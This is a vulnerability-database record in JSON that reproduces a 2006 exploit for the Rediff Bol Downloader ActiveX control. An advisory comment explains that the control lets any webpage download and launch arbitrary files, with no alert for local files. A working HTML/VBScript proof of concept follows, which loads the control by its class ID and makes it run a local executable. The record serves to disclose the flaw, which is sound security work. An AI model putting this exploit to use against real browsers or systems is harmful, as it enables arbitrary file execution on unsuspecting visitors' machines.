Exploit for unknown platform in category remote exploits
{"id": "1337DAY-ID-8804", "type": "zdt", "bulletinFamily": "exploit", "title": "Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit", "description": "Exploit for unknown platform in category remote exploits", "published": "2006-12-31T00:00:00", "modified": "2006-12-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/8804", "reporter": "Gregory R. Panakkal", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-03T13:29:54", "viewCount": 6, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/8804", "sourceData": "==================================================================\r\nRediff Bol Downloader (ActiveX Control) Execute Local File Exploit\r\n==================================================================\r\n\r\n<!--\r\nRediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary\r\nFiles\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\nAffected Program : Rediff Bol Download ActiveX\r\nActiveX (OCX) Control that downloads the Rediff Bol Messenger\r\nsetup and spawns it.\r\n\r\n\r\nRelated URL : http://messenger.rediff.com/newbol/\r\n\r\n\r\nDiscovered by : Gregory R. Panakkal\r\n\r\n\r\nVulnerability Description :\r\n\r\nRediff Bol Downloader ActiveX control allows any webpage\r\nto download and spawn file. These file can be of any type.\r\nNo filtering is done.\r\n\r\nIE Displays an alert, if the code points to a executable file on the\r\ninternet. But execution of local files displays no alert.\r\n\r\n\r\nTested On :\r\n* IE 7.0.5730.11 (WinXP SP2)\r\n* IE 6.0.2900.2180 (WinXP SP2)\r\n-->\r\n\r\n<html>\r\n\r\n<body>\r\n<OBJECT id=\"rboldwn\" WIDTH=445 HEIGHT=40 classid=\"clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03\" codebase=\"http://imdownloads.rediff.com/newbol/Bol.CAB\">\r\n</OBJECT>\r\n\r\n<script language=\"vbscript\">\r\n rboldwn.url = \"file://C:/WINNT/Notepad.exe\"\r\n rboldwn.fontsize = 14\r\n rboldwn.barcolor = EE4E00\r\n rboldwn.start = \"start\"\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\n\n# 0day.today [2018-04-03] #", "_state": {"dependencies": 1647891904, "score": 1659766679, "epss": 1678812679}}
Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit